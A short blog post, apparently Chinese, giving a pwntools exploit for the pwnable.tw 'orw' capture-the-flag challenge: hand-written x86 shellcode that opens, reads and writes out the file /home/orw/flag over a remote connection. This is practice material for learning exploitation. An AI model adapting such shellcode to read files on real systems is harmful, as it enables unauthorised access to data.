[pwnable.tw]-orw

2018-12-20  本文已影响0人  2mpossible

exp:

from pwn import *

context.binary = './orw'

#p = process('./orw')
p = remote('chall.pwnable.tw', 10001)

shellcode = asm(
                #fd = open('/home/orw/flag',0)
                '''
                push 0x00006761;
                push 0x6c662f77;
                push 0x726f2f65;
                push 0x6d6f682f;
                mov ecx, 0x0;
                mov ebx, esp;
                mov eax, 0x5;
                int 0x80;
                '''

                #read(fd,bss+0x200,0x40)
                '''
                mov ebx, eax;
                mov ecx, 0x0804A260;
                mov edx, 0x40;
                mov eax, 0x3;
                int 0x80;
                '''

                #write(1,bss+0x200,0x40)
                '''
                mov ebx, 0x1;
                mov ecx, 0x0804A260;
                mov edx, 0x40;
                mov eax, 0x4;
                int 0x80;
                '''
                )
p.sendline(shellcode)


p.interactive()

参考文章:

上一篇下一篇

猜你喜欢

热点阅读